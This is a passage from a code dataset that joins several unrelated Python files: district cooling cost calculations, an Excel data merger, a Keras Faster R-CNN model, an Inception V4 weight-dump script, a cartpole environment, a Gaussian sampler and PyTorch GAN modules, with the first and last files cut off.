dfBest[\"Operation Costs [CHF]\"].iloc[0]\n Capex_a_total_disconnected += dfBest[\"Annualized Investment Costs [CHF]\"].iloc[0]\n Capex_total_disconnected += (dfBest[\"Annualized Investment Costs [CHF]\"].iloc[0] * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT)\n data_costs['Capex_total_disconnected_Mio'] = Capex_total_disconnected / 1000000\n data_costs['Opex_total_disconnected_Mio'] = Opex_total_disconnected / 1000000\n data_costs['Capex_a_disconnected_Mio'] = Capex_a_total_disconnected / 1000000\n\n data_costs['Capex_a_disconnected'] = Capex_a_total_disconnected\n data_costs['Opex_total_disconnected'] = Opex_total_disconnected\n\n data_costs['costs_Mio'] = data_raw['population']['costs_Mio'][individual]\n data_costs['emissions_kiloton'] = data_raw['population']['emissions_kiloton'][individual]\n data_costs['prim_energy_TJ'] = data_raw['population']['prim_energy_TJ'][individual]\n\n # Network costs\n network_costs_a = network_features.pipesCosts_DCN * DCN_barcode.count(\"1\") / len(DCN_barcode)\n data_costs['Network_costs'] = network_costs_a\n Inv_IR = 0.05\n Inv_LT = 20\n network_costs_total = (network_costs_a * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT)\n data_costs['Network_costs_Total'] = network_costs_total\n # Substation costs\n substation_costs_a = 0\n substation_costs_total = 0\n for (index, building_name) in zip(DCN_barcode, building_names):\n if index == \"1\":\n if df_current_individual['Data Centre'][0] == 1:\n df = pd.read_csv(locator.get_optimization_substations_results_file(building_name),\n usecols=[\"Q_space_cooling_and_refrigeration_W\"])\n else:\n df = pd.read_csv(locator.get_optimization_substations_results_file(building_name),\n usecols=[\"Q_space_cooling_data_center_and_refrigeration_W\"])\n\n subsArray = np.array(df)\n\n Q_max_W = np.amax(subsArray)\n HEX_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"HEX\")\n HEX_cost_data = HEX_cost_data[HEX_cost_data['code'] == 'HEX1']\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if Q_max_W < HEX_cost_data.iloc[0]['cap_min']:\n Q_max_W = HEX_cost_data.iloc[0]['cap_min']\n HEX_cost_data = HEX_cost_data[\n (HEX_cost_data['cap_min'] <= Q_max_W) & (HEX_cost_data['cap_max'] > Q_max_W)]\n\n Inv_a = HEX_cost_data.iloc[0]['a']\n Inv_b = HEX_cost_data.iloc[0]['b']\n Inv_c = HEX_cost_data.iloc[0]['c']\n Inv_d = HEX_cost_data.iloc[0]['d']\n Inv_e = HEX_cost_data.iloc[0]['e']\n Inv_IR = (HEX_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = HEX_cost_data.iloc[0]['LT_yr']\n Inv_OM = HEX_cost_data.iloc[0]['O&M_%'] / 100\n\n InvC = Inv_a + Inv_b * (Q_max_W) ** Inv_c + (Inv_d + Inv_e * Q_max_W) * log(Q_max_W)\n\n Capex_a = InvC * (Inv_IR) * (1 + Inv_IR) ** Inv_LT / ((1 + Inv_IR) ** Inv_LT - 1)\n Opex_fixed = Capex_a * Inv_OM\n substation_costs_total += InvC\n substation_costs_a += Capex_a + Opex_fixed\n\n data_costs['Substation_costs'] = substation_costs_a\n data_costs['Substation_costs_Total'] = substation_costs_total\n # Electricity Details/Renewable Share\n total_electricity_demand_decentralized_W = np.zeros(8760)\n\n DCN_barcode = \"\"\n for name in building_names: # identifying the DCN code\n DCN_barcode += str(int(df_current_individual[name + ' DCN'].values[0]))\n for i, name in zip(DCN_barcode,\n building_names): # adding the electricity demand from the decentralized buildings\n if i is '0':\n building_demand = pd.read_csv(locator.get_demand_results_folder() + '//' + name + \".csv\",\n usecols=['E_sys_kWh'])\n\n total_electricity_demand_decentralized_W += building_demand['E_sys_kWh'] * 1000\n\n lca = lca_calculations(locator, config)\n\n data_electricity_processed = electricity_import_and_exports(generation_number, individual_number, locator, config)\n\n\n data_costs['Network_electricity_demand_GW'] = (data_electricity['E_total_req_W'].sum()) / 1000000000 # GW\n data_costs['Decentralized_electricity_demand_GW'] = (data_electricity_processed['E_decentralized_appliances_W'].sum()) / 1000000000 # GW\n data_costs['Total_electricity_demand_GW'] = (data_electricity_processed['E_total_req_W'].sum()) / 1000000000 # GW\n data_costs['Electricity_for_hotwater_GW'] = (data_electricity_processed['E_for_hot_water_demand_W'].sum()) / 1000000000 # GW\n data_costs['Electricity_for_appliances_GW'] = (data_electricity_processed['E_appliances_total_W'].sum()) / 1000000000 # GW\n\n renewable_share_electricity = (data_electricity_processed['E_PV_to_directload_W'].sum() +\n data_electricity_processed['E_PV_to_grid_W'].sum()) * 100 / \\\n (data_costs['Total_electricity_demand_GW'] * 1000000000)\n data_costs['renewable_share_electricity'] = renewable_share_electricity\n\n data_costs['Electricity_Costs_Mio'] = ((data_electricity_processed['E_from_grid_W'].sum() +\n data_electricity_processed[\n 'E_total_to_grid_W_negative'].sum()) * lca.ELEC_PRICE) / 1000000\n\n data_costs['Capex_a_total_Mio'] = (Capex_a_ACH * number_of_ACH_chillers + Capex_a_VCC * number_of_VCC_chillers + \\\n Capex_a_VCC_backup * number_of_VCC_backup_chillers + Capex_a_CT * number_of_CT + Capex_a_storage_tank + \\\n Capex_a_total_pumps + Capex_a_CCGT + Capex_a_PV + Capex_a_total_disconnected + substation_costs_a + network_costs_a) / 1000000\n\n data_costs['Capex_a_ACH'] = Capex_a_ACH * number_of_ACH_chillers\n data_costs['Capex_a_VCC'] = Capex_a_VCC * number_of_VCC_chillers\n data_costs['Capex_a_VCC_backup'] = Capex_a_VCC_backup * number_of_VCC_backup_chillers\n data_costs['Capex_a_CT'] = Capex_a_CT * number_of_CT\n data_costs['Capex_a_storage_tank'] = Capex_a_storage_tank\n data_costs['Capex_a_total_pumps'] = Capex_a_total_pumps\n data_costs['Capex_a_CCGT'] = Capex_a_CCGT\n data_costs['Capex_a_PV'] = Capex_a_PV\n\n data_costs['Capex_total_Mio'] = (data_costs['Capex_total_ACH'] + data_costs['Capex_total_VCC'] + data_costs['Capex_total_VCC_backup'] + \\\n data_costs['Capex_total_storage_tank'] + data_costs['Capex_total_CT'] + data_costs['Capex_total_CCGT'] + \\\n data_costs['Capex_total_pumps'] + data_costs['Capex_total_PV'] + Capex_total_disconnected + substation_costs_total + network_costs_total) / 1000000\n\n data_costs['Opex_total_Mio'] = (((data_costs['Opex_total_ACH'] + data_costs['Opex_total_VCC'] + data_costs['Opex_total_VCC_backup'] + \\\n data_costs['Opex_total_storage_tank'] + data_costs['Opex_total_CT'] + data_costs['Opex_total_CCGT'] + \\\n data_costs['Opex_total_pumps'] + Opex_total_disconnected)) + data_costs['Opex_total_PV'] + \\\n data_costs['Total_electricity_demand_GW'] * 1000000000 * lca.ELEC_PRICE) / 1000000\n\n data_costs['TAC_Mio'] = data_costs['Capex_a_total_Mio'] + data_costs['Opex_total_Mio']\n\n # temporary fix for bug in emissions calculation, change it after executive course\n data_costs['total_emissions_kiloton'] = data_costs['emissions_kiloton'] - abs(2 * data_emissions['CO2_PV_disconnected'] / 1000000)\n data_costs['total_prim_energy_TJ'] = data_costs['prim_energy_TJ'] - abs(2 * data_emissions['Eprim_PV_disconnected'] / 1000000)\n\n\n return data_costs\n\ndef main(config):\n locator = cea.inputlocator.InputLocator(config.scenario)\n\n print(\"Running multicriteria with scenario = %s\" % config.scenario)\n print(\"Running multicriteria for generation = %s\" % config.multi_criteria.generations)\n\n multi_criteria_main(locator, config)\n\n\nif __name__ == '__main__':\n main(cea.config.Configuration())","sub_path":"cea/analysis/multicriteria/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":34218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"648534426","text":"#!/usr/bin/env python\n'''\nPython program to extract faces data and append to a single large csv file (>600MB)\n\nFile Issues: manually fix these so that the header row is 9\n - T034-005.xlsx: header starts on row 8\n - T009-006.xlsx: header starts on row 10\n'''\n\n\nimport os\nimport pandas as pd\n\n# Get list of files in directory\nlst = sorted(os.listdir(\"Faces\"))\n\n# Path to Files\npath = \"Faces/\"\n\n# Variable Start/Stop\nx1 = 0\n\n# First File\noutput = pd.read_excel(path + lst[x1], header=8, parse_cols=\"A:J\")\n\n# Create ID\noutput[\"ID\"] = lst[x1]\n\n# Loop for all of the files in\nfor x in lst[x1 + 1:]:\n tmp = pd.read_excel(path + x, header=8, parse_cols=\"A:J\")\n tmp[\"ID\"] = x\n output = output.append(tmp)\n\n# Create some ID columns\noutput[\"ID\"] = output[\"ID\"].str[:8]\n\n# Export data\noutput.to_csv(\"data-faces.csv\", index=False)\n","sub_path":"Files/extract_faces.py","file_name":"extract_faces.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"612845398","text":"from keras import Model\nfrom keras.layers import Flatten, Dense, Conv2D, MaxPooling2D, Input\nfrom keras.layers import TimeDistributed\n\nfrom keras_frcnn.RoiPoolingConv import RoiPoolingConv\n\n\ndef get_weight_path():\n return None\n\ndef get_img_output_length(width, height):\n def get_output_length(input_length):\n return input_length/16\n\n return get_output_length(width), get_output_length(height)\n\n\ndef nn_base(input_tensor, trainable=True):\n # block 1\n x = Conv2D(8, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block1_conv1')(input_tensor)\n x = Conv2D(8, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block1_conv2')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)\n\n # block 2\n x = Conv2D(16, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block2_conv1')(x)\n x = Conv2D(16, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block2_conv2')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)\n\n # block 3\n x = Conv2D(32, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block3_conv1')(x)\n x = Conv2D(32, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block3_conv2')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)\n\n # Block 4\n x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block4_conv1')(x)\n x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block4_conv2')(x)\n x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block4_conv3')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)\n\n return x\n\n\ndef rpn(base_layers, num_anchors):\n x = Conv2D(32, (3, 3), padding='same', activation='relu', kernel_initializer='he_uniform', name='rpn_conv1')(base_layers)\n\n x_class = Conv2D(num_anchors, (1, 1), activation='sigmoid', kernel_initializer='uniform', name='rpn_out_class')(x)\n x_regr = Conv2D(num_anchors * 4, (1, 1), activation='linear', kernel_initializer='uniform', name='rpn_out_regr')(x)\n\n return [x_class, x_regr]\n\n\ndef classifier(base_layers, input_rois, num_rois, nb_classes=21, trainable=True):\n pooling_regions = 7\n out_roi_pool = RoiPoolingConv(pooling_regions, num_rois)([base_layers, input_rois])\n\n out = TimeDistributed(Flatten(name='flatten'), name='td1')(out_roi_pool)\n out = TimeDistributed(Dense(128, activation='relu', name='fc1'), name='td2')(out)\n out = TimeDistributed(Dense(128, activation='relu', name='fc2'), name='td3')(out)\n\n out_class = TimeDistributed(Dense(nb_classes, activation='softmax', kernel_initializer='zero'), name='dense_class_{}'.format(nb_classes))(out)\n # note: no regression target for bg class\n out_regr = TimeDistributed(Dense(4 * (nb_classes-1), activation='linear', kernel_initializer='zero'), name='dense_regress_{}'.format(nb_classes))(out)\n\n return [out_class, out_regr]\n\n\nif __name__ == '__main__':\n input_shape_img = (None, None, 3)\n\n # input placeholder 정의\n img_input = Input(shape=input_shape_img)\n roi_input = Input(shape=(None, 4))\n\n # base network(feature extractor) 정의 (resnet, VGG, Inception, Inception Resnet V2, etc)\n shared_layers = nn_base(img_input, trainable=True)\n\n # define the RPN, built on the base layers\n # RPN 정의\n num_anchors = 9\n rpn = rpn(shared_layers, num_anchors)\n\n # detection network 정의\n classifier = classifier(shared_layers, roi_input, 300, nb_classes=2, trainable=True)\n\n model_rpn = Model(img_input, rpn[:2])\n model_classifier = Model([img_input, roi_input], classifier)\n\n # this is a model that holds both the RPN and the classifier, used to load/save weights for the models\n model_all: Model = Model([img_input, roi_input], rpn[:2] + classifier)\n print(model_all.summary(positions=[.3, .6, .8, 1.]))\n","sub_path":"keras_frcnn/fannet.py","file_name":"fannet.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"229379458","text":"# python3\n\n# TensorBoard\n# python3 ~/.local/lib/python3.5/site-packages/tensorflow/tensorboard/tensorboard.py --logdir=logs --port=6007\n\nimport os\nimport sys\nimport h5py\nimport math\nimport urllib.request\nimport numpy as np\nimport tensorflow as tf\n\nsys.path.append('models/slim')\nfrom datasets import dataset_utils\nfrom datasets import imagenet\nfrom nets import inception\nfrom preprocessing import inception_preprocessing\n\nslim = tf.contrib.slim\n\nimage_size = inception.inception_v3.default_image_size\n\nurl = 'http://download.tensorflow.org/models/inception_v4_2016_09_09.tar.gz'\ncheckpoints_dir = '/tmp/checkpoints'\n\ndef make_padding(padding_name, conv_shape):\n padding_name = padding_name.decode(\"utf-8\")\n if padding_name == \"VALID\":\n return [0, 0]\n elif padding_name == \"SAME\":\n #return [math.ceil(int(conv_shape[0])/2), math.ceil(int(conv_shape[1])/2)]\n return [math.floor(int(conv_shape[0])/2), math.floor(int(conv_shape[1])/2)]\n else:\n sys.exit('Invalid padding name '+padding_name)\n\n\n# if not tf.gfile.Exists(checkpoints_dir+'inception_v4.ckpt'):\n# tf.gfile.MakeDirs(checkpoints_dir)\n# dataset_utils.download_and_uncompress_tarball(url, checkpoints_dir)\n\nwith tf.Graph().as_default():\n\n\n # Create model architecture\n\n inputs = np.zeros((1,299,299,3), dtype=np.float32)\n inputs[0][0][0][0] = 1\n inputs = tf.pack(inputs)\n\n with slim.arg_scope(inception.inception_v4_arg_scope()):\n logits, _ = inception.inception_v4(inputs, num_classes=1001, is_training=False)\n\n with tf.Session() as sess:\n\n # Initialize model\n\n init_fn = slim.assign_from_checkpoint_fn(\n os.path.join(checkpoints_dir, 'inception_v4.ckpt'),\n slim.get_model_variables('InceptionV4')) \n\n init_fn(sess)\n\n # Display model variables\n\n for v in slim.get_model_variables():\n print('name = {}, shape = {}'.format(v.name, v.get_shape()))\n\n # Create graph\n\n #os.system('rm -rf logs')\n #os.makedirs(\"logs\")\n\n tf.scalar_summary('logs', logits[0][0])\n summary_op = tf.merge_all_summaries()\n summary_writer = tf.train.SummaryWriter(\"logs\", sess.graph)\n\n out = sess.run(summary_op)\n summary_writer.add_summary(out, 0)\n\n # Dump \n \n\n \n\n def dump_conv2d(name='Conv2d_1a_3x3'):\n \n conv_operation = sess.graph.get_operation_by_name('InceptionV4/InceptionV4/'+name+'/Conv2D')\n\n weights_tensor = sess.graph.get_tensor_by_name('InceptionV4/'+name+'/weights:0')\n weights = weights_tensor.eval()\n\n padding = make_padding(conv_operation.get_attr('padding'), weights_tensor.get_shape())\n strides = conv_operation.get_attr('strides')\n\n conv_out = sess.graph.get_operation_by_name('InceptionV4/InceptionV4/'+name+'/Conv2D').outputs[0].eval()\n \n beta = sess.graph.get_tensor_by_name('InceptionV4/'+name+'/BatchNorm/beta:0').eval()\n #gamma = sess.graph.get_tensor_by_name('InceptionV4/'+name+'/BatchNorm/gamma:0').eval()\n mean = sess.graph.get_tensor_by_name('InceptionV4/'+name+'/BatchNorm/moving_mean:0').eval()\n var = sess.graph.get_tensor_by_name('InceptionV4/'+name+'/BatchNorm/moving_variance:0').eval()\n \n relu_out = sess.graph.get_operation_by_name('InceptionV4/InceptionV4/'+name+'/Relu').outputs[0].eval()\n\n os.system('mkdir -p dump/InceptionV4/'+name)\n h5f = h5py.File('dump/InceptionV4/'+name+'.h5', 'w')\n # conv\n h5f.create_dataset(\"weights\", data=weights)\n h5f.create_dataset(\"strides\", data=strides)\n h5f.create_dataset(\"padding\", data=padding)\n h5f.create_dataset(\"conv_out\", data=conv_out)\n # batch norm\n h5f.create_dataset(\"beta\", data=beta)\n #h5f.create_dataset(\"gamma\", data=gamma)\n h5f.create_dataset(\"mean\", data=mean)\n h5f.create_dataset(\"var\", data=var)\n h5f.create_dataset(\"relu_out\", data=relu_out)\n h5f.close()\n\n def dump_mixed_4a_7a(name='Mixed_4a'):\n dump_conv2d(name=name+'/Branch_0/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_0/Conv2d_1a_3x3')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0b_1x7')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0c_7x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_1a_3x3')\n\n def dump_mixed_5(name='Mixed_5b'):\n dump_conv2d(name=name+'/Branch_0/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0b_3x3')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0b_3x3')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0c_3x3')\n dump_conv2d(name=name+'/Branch_3/Conv2d_0b_1x1')\n\n def dump_mixed_6(name='Mixed_6b'):\n dump_conv2d(name=name+'/Branch_0/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0b_1x7')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0c_7x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0b_7x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0c_1x7')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0d_7x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0e_1x7')\n dump_conv2d(name=name+'/Branch_3/Conv2d_0b_1x1')\n\n def dump_mixed_7(name='Mixed_7b'):\n dump_conv2d(name=name+'/Branch_0/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0b_1x3')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0c_3x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0b_3x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0c_1x3')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0d_1x3')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0e_3x1')\n dump_conv2d(name=name+'/Branch_3/Conv2d_0b_1x1')\n\n dump_conv2d(name='Conv2d_1a_3x3')\n dump_conv2d(name='Conv2d_2a_3x3')\n dump_conv2d(name='Conv2d_2b_3x3')\n\n dump_conv2d(name='Mixed_3a/Branch_1/Conv2d_0a_3x3')\n dump_mixed_4a_7a(name='Mixed_4a')\n dump_conv2d(name='Mixed_5a/Branch_0/Conv2d_1a_3x3')\n\n dump_mixed_5(name='Mixed_5b')\n dump_mixed_5(name='Mixed_5c')\n dump_mixed_5(name='Mixed_5d')\n dump_mixed_5(name='Mixed_5e')\n\n dump_conv2d(name='Mixed_6a/Branch_0/Conv2d_1a_3x3')\n dump_conv2d(name='Mixed_6a/Branch_1/Conv2d_0a_1x1')\n dump_conv2d(name='Mixed_6a/Branch_1/Conv2d_0b_3x3')\n dump_conv2d(name='Mixed_6a/Branch_1/Conv2d_1a_3x3')\n\n dump_mixed_6(name='Mixed_6b')\n dump_mixed_6(name='Mixed_6c')\n dump_mixed_6(name='Mixed_6d')\n dump_mixed_6(name='Mixed_6e')\n dump_mixed_6(name='Mixed_6f')\n dump_mixed_6(name='Mixed_6g')\n dump_mixed_6(name='Mixed_6h')\n\n dump_mixed_4a_7a(name='Mixed_7a')\n\n dump_mixed_7(name='Mixed_7b')\n dump_mixed_7(name='Mixed_7c')\n dump_mixed_7(name='Mixed_7d')\n\n\n # AuxLogits/Conv2d_1b_1x1\n # AuxLogits/Conv2d_2a\n\n # name = InceptionV4/AuxLogits/Aux_logits/weights:0, shape = (768, 1001)\n # name = InceptionV4/AuxLogits/Aux_logits/biases:0, shape = (1001,)\n # name = InceptionV4/Logits/Logits/weights:0, shape = (1536, 1001)\n # name = InceptionV4/Logits/Logits/biases:0, shape = (1001,)\n\n\n # operations = sess.graph.get_operations()\n # print(len(operations))\n \n #sess.graph.get_tensor_by_name(\n\n\n # for v in sess.graph.get_operations():\n # print(v.name)\n\n\n\n # if not os.path.exists(\"dump\"):\n # os.makedirs(\"dump\")\n\n # for v in slim.get_model_variables():\n # print('name = {}, shape = {}'.format(v.name, v.get_shape()))\n\n # gname = 'InceptionV3/Conv2d_1a_3x3'\n # weights = sess.graph.get_operation_by_name(gname + '/weights:0')\n\n\n # weights = sess.graph.get_tensor_by_name(gname + '/conv2d_params:0').eval()\n # padding = make_padding(conv.get_attr(\"padding\"), weights.shape)\n # strides = conv.get_attr(\"strides\")\n\n # beta = sess.graph.get_tensor_by_name(gname + '/batchnorm/beta:0').eval()\n # gamma = sess.graph.get_tensor_by_name(gname + '/batchnorm/gamma:0').eval()\n # mean = sess.graph.get_tensor_by_name(gname + '/batchnorm/moving_mean:0').eval()\n # var = sess.graph.get_tensor_by_name(gname + '/batchnorm/moving_variance:0').eval()\n\n\n #conv = sess.graph.get_operation_by_name('InceptionV3/Conv2d_1a_3x3')\n\n #weights = sess.graph.get_tensor_by_name('InceptionV3/Conv2d_1a_3x3')\n #conv = slim.get_model_variables()\n\n # saver = tf.train.Saver(tf.global_variables())\n\n # with tf.Session() as sess:\n # m = saver.restore(sess, os.path.join(checkpoints_dir, 'inception_v3.ckpt'))\n\n # url = 'https://upload.wikimedia.org/wikipedia/commons/7/70/EnglishCockerSpaniel_simon.jpg'\n # image_string = urllib.request.urlopen(url).read()\n # image = tf.image.decode_jpeg(image_string, channels=3)\n # processed_image = inception_preprocessing.preprocess_image(image, image_size, image_size, is_training=False)\n # processed_images = tf.expand_dims(processed_image, 0)\n\n# with slim.arg_scope(inception.inception_v3_arg_scope()):\n# logits, _ = inception.inception_v3(processed_images, num_classes=1001, is_training=False)\n \n# probabilities = tf.nn.softmax(logits)\n\n# for v in slim.get_model_variables():\n# print('name = {}, shape = {}'.format(v.name, v.get_shape()))\n\n # init_fn = slim.assign_from_checkpoint_fn(\n # os.path.join(checkpoints_dir, 'inception_v3.ckpt'),\n # slim.get_model_variables('InceptionV3'))\n\n# with tf.Session() as sess:\n# init_fn(sess)\n# np_image, probabilities = sess.run([image, probabilities])\n# probabilities = probabilities[0, 0:]\n# sorted_inds = [i[0] for i in sorted(enumerate(-probabilities), key=lambda x:x[1])]\n\n # print('image', image)\n # print()\n # print('np_image', np_image)\n # print()\n # print('proba', probabilities)\n # print()\n # # print('sorted_inds', sorted_inds)\n\n # names = imagenet.create_readable_names_for_imagenet_labels()\n # for i in range(5):\n # index = sorted_inds[i]\n # print('Probability %0.2f%% => [%s]' % (probabilities[index], names[index]))","sub_path":"inceptionv4_dump_filters.py","file_name":"inceptionv4_dump_filters.py","file_ext":"py","file_size_in_byte":9970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"348949459","text":"import gym\nfrom gym import spaces\nfrom gym.utils import seeding\n\nimport autograd.numpy as np\n\n\ndef normalize(x):\n return ((x + np.pi) % (2. * np.pi)) - np.pi\n\n\nclass Cartpole(gym.Env):\n\n def __init__(self):\n self.dm_state = 2\n self.dm_act = 1\n self.dm_obs = 2\n\n self._dt = 0.1\n\n self._sigma = 1.e-64 * np.eye(self.dm_state)\n\n self._state_max = np.array([np.pi, np.inf])\n\n self._obs_max = np.array([np.pi, np.inf])\n self.observation_space = spaces.Box(low=-self._obs_max,\n high=self._obs_max)\n\n self._act_max = 50.\n self.action_space = spaces.Box(low=-self._act_max,\n high=self._act_max, shape=(1,))\n\n self.state = None\n self.np_random = None\n\n self.seed()\n\n @property\n def xlim(self):\n return self._state_max\n\n @property\n def ulim(self):\n return self._act_max\n\n @property\n def dt(self):\n return self._dt\n\n def dynamics(self, x, u):\n g, m, l, M = 9.81, 2.0, 0.5, 8.0\n a = 1.0 / (m + M)\n\n dx = np.array([x[1],\n (g * np.sin(x[0]) - 0.5 * a * m * l * x[1]**2 * np.sin(2 * x[0]) -\n a * np.cos(x[0]) * u) / (4.0 * l / 3.0 - a * m * l * np.cos(x[0])**2)])\n\n return x + self._dt * dx\n\n def action(self, u):\n if u == 0:\n return -50.0\n elif u == 1:\n return 50.0\n else:\n return 0.0\n\n def observe(self, x):\n return x\n\n def noise(self, x=None, u=None):\n return self._sigma\n\n def reward(self, x):\n if np.fabs(x[0]) <= 0.5 * np.pi:\n return np.array([0.0])\n else:\n return np.array([-1.0])\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def step(self, u):\n _u = self.action(u)\n\n done = False\n if np.fabs(self.state[0]) > 0.5 * np.pi:\n done = True\n\n rwrd = self.reward(self.state)\n\n self.state = self.dynamics(self.state, _u)\n self.state[0] = normalize(self.state[0])\n\n return self.observe(self.state), rwrd, done, {}\n\n def reset(self):\n self.state = np.random.uniform(-0.1, 0.1, size=2)\n return self.observe(self.state)\n","sub_path":"rl/envs/control/lagoudakis/cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"464450432","text":"import numpy as np\nimport numpy.random as rand\n\nclass SimpleTwoDimGaussian:\n \"\"\"Sampling simple 2-dim correlated Gaussian distribution\n\n Args:\n data_size (int): Size of data.\n corrcoef (int) : Correlation coefficient\n\n Attributes:\n dim (int) : dimension of data, 2.\n var (float) : Variance of each gaussian.\n corrcoef (float) : Correlations\n\n \"\"\"\n\n def __init__(self, data_size=10, corrcoef=0.6, var=1.0):\n self.dim = 2\n self.var = var \n self.data_size = data_size\n self.corrcoef = corrcoef\n\n def generate(self):\n \"\"\"Generate sample data whose number is data_size\n\n Args:\n\n Return:\n data (np.ndarray) : Sample data,shape (data_size, 2), dtype is float32\n \"\"\"\n stdev = np.sqrt(self.var)\n\n x = stdev * rand.randn(self.data_size).astype(np.float32) \n y = stdev * rand.randn(self.data_size).astype(np.float32)\n z = self.corrcoef * x + ( 1 - self.corrcoef**2)**0.5 * y\n z = z.astype(np.float32)\n data = np.stack([x,z],1)\n return data\n\n def energy(self, z=None, analytical=False):\n \"\"\"Return energy for variational free energy loss.\n\n Args:\n \n Args:\n z (torch.tensor) : Data, shape (batch size, 2).\n analytical (bool) : Return value analytically caluculated. \n In this mode, data input is not required.\n \"\"\"\n if(not analytical):\n x = z[:,0]\n y = z[:,1]\n numerator = 0.5 * (x ** 2 + y ** 2 - 2.0* self.corrcoef * x * y)\n denominator = (1.0 - self.corrcoef ** 2.0) * self.var\n total_energy = numerator / denominator\n else:\n total_energy = 1.0\n\n return total_energy\n","sub_path":"neuct/neuct/distributions/simple_two_dim_gaussian.py","file_name":"simple_two_dim_gaussian.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"274781441","text":"\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torch.autograd import grad,Variable\r\nfrom torch.utils.data import DataLoader\r\n\r\nimport numpy as np\r\n\r\nuse_cuda = torch.cuda.is_available()\r\ndevice = torch.device('cuda' if use_cuda else 'cpu')\r\nclass Discriminator(nn.Module):\r\n\r\n def __init__(self, n_labels):\r\n super(Discriminator, self).__init__()\r\n input_dim = n_labels\r\n self.main = nn.Sequential(\r\n nn.Linear(input_dim, 128),\r\n nn.ReLU(),\r\n nn.Linear(128, 64),\r\n nn.ReLU(),\r\n nn.Linear(64, 32),\r\n nn.ReLU(),\r\n nn.Linear(32, 1),\r\n )\r\n\r\n def forward(self, input):\r\n output = self.main(input)\r\n return output\r\n\r\nclass MultipleBranchesDiscriminator(nn.Module):\r\n def __init__(self, n_labels):\r\n super(MultipleBranchesDiscriminator, self).__init__()\r\n input_dim = n_labels\r\n branches = []\r\n for i in range(1):\r\n branch = nn.Sequential(\r\n nn.Linear(input_dim, 512),\r\n nn.ReLU(),\r\n nn.Linear(512, 256),\r\n nn.ReLU(),\r\n nn.Linear(256, 128),\r\n nn.ReLU(),\r\n nn.Linear(128, 1)\r\n )\r\n branches.append(branch)\r\n self.branches = nn.Sequential(*branches)\r\n\r\n def forward(self, input):\r\n scores = []\r\n for branch in self.branches:\r\n score = branch(input)\r\n scores.append(score)\r\n return torch.cat(scores, dim=1)\r\n\r\nclass Divide(nn.Module):\r\n def __init__(self, lambda_):\r\n super(Divide, self).__init__()\r\n self.lambda_ = lambda_\r\n def forward(self, x):\r\n return x/self.lambda_\r\n\r\nclass Generator_Imputer(nn.Module):\r\n\r\n def __init__(self, n_labels):\r\n super(Generator_Imputer, self).__init__()\r\n input_dim = n_labels\r\n # Note: without branches\r\n self.main = nn.Sequential(\r\n nn.Linear(input_dim, 64),\r\n nn.ReLU(),\r\n nn.Linear(64, 128),\r\n nn.ReLU(),\r\n nn.Linear(128, 64),\r\n nn.ReLU(),\r\n nn.Linear(64, 